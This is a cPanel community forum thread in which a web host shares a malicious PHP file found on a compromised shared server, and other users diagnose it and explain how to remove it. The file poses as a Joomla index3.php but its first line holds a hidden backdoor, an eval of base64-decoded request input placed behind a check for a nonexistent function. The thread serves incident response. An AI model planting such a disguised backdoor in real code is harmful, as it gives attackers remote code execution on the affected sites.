The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

php Malware problem

Discussion in 'Security' started by afradata, Feb 14, 2013.

  1. afradata

    afradata Registered

    Joined:
    Feb 14, 2013
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Root Administrator
    Hi 2 all

    Sorry my English is not good

    i have a cpanel shared hosting . my server is in xlhost dc

    I've received a few BroBot Malware complaints from bank of america

    xlhost find user and file hve abuse and send me user information

    Malware file is a php cod whene see url on browser open joomla administrator login page

    php code file. please see it

    PHP:
    <?php
    function_exists
    ('date_default_timezone') ? date_default_timezone_set('America/Los_Angeles') : @eval(base64_decode($_REQUEST['c_id']));
    /**
    * @version        $Id: index3.php 14401 2010-01-26 14:10:00Z louis $
    * @package        Joomla
    * @copyright    Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
    * @license        GNU/GPL, see LICENSE.php
    * Joomla! is free software. This version may have been modified pursuant
    * to the GNU General Public License, and as distributed it includes or
    * is derivative of works licensed under the GNU General Public License or
    * other free or open source software licenses.
    * See COPYRIGHT.php for copyright notices and details.
    */

    $_REQUEST['tmpl'] = 'component';
    include(
    'index.php');
    ?>
    please help me to finde this file on my serverand remove it or block it

    Thanks All
     
  2. srpurdy

    srpurdy Well-Known Member

    Joined:
    Jun 1, 2011
    Messages:
    101
    Likes Received:
    0
    Trophy Points:
    16
    cPanel Access Level:
    Root Administrator
    Nothing looks unusal in that file. It's more likely a either a mysql injection, or the index.php file (or htaccess) So I would start by looking at the index.php file, and the .htaccess file.

    Although that eval() function looks odd.. But it's only requesting infomation. So there has to be a connection to the index.php file
     
    #2 srpurdy, Feb 14, 2013
    Last edited: Feb 14, 2013
  3. brianoz

    brianoz Well-Known Member

    Joined:
    Mar 13, 2004
    Messages:
    1,146
    Likes Received:
    6
    Trophy Points:
    38
    Location:
    Melbourne, Australia
    cPanel Access Level:
    Root Administrator
    This is one of the newer tricks - they don't leave the code on the server, they just POST to the PHP file with, in this case, the code in the variable $_REQUEST['cid']. As you say, the code looks surprisingly benign, but it's not. It's like a permanent backdoor into the server!

    One of the clever tricks is that this function name 'date_default_timezone' sounds like one of the PHP functions on the server. However, it's a function that never exists, so the base64_decode (carefully hidden off to the right of the line) is always run.

    You can almost certainly safely remove that first line in it's entirety and you should then be secure.
     
    SageBrian likes this.
  4. cPanelJamyn

    cPanelJamyn Social Engineer
    Staff Member

    Joined:
    Jan 29, 2009
    Messages:
    105
    Likes Received:
    2
    Trophy Points:
    0
    Well, to clarify - if you remove the function_exists('date_default_timezone') ? line, the backdoor will be removed. It's still important to:

    1. determine how they got in. Presumably you are running an old, exploitable version of Joomla (or an old plugin for the platform). It's critical that you keep it up to date, as it's a popular target with a lot of vulnerabilities.

    2. clean up. Search all the files for that (or similar) lines. If they were smart, they'd install at least 3-4 backdoors in the hopes you'll miss one.

    3. ensure all software is up to date. If you have Wordpress or Drupal or other PHP apps on the account(s), update those too.

    4. reset your passwords. They got in once already, so make sure you have new passwords.

    Ideally, you'd do a complete recreation of the account after a compromise (install new software, restore the DB data, etc), but I understand that's sometimes not possible.
     
  5. bibiloi

    bibiloi Registered

    Joined:
    Mar 8, 2013
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Root Administrator
    Modifing the php file to print what that c_id variable contains to something like that:

    After a POST :

    this is what contains the /tmp/hacker.tmp file:

    - snipped -
     
    #5 bibiloi, Mar 8, 2013
    Last edited by a moderator: Mar 8, 2013
  6. afradata

    afradata Registered

    Joined:
    Feb 14, 2013
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Root Administrator
    Please Help me

    Can i block this cod @eval(base64_decode($_REQUEST['c_id'])); by mod_security

    i recive Warnings from xlhost
     
Loading...

Share This Page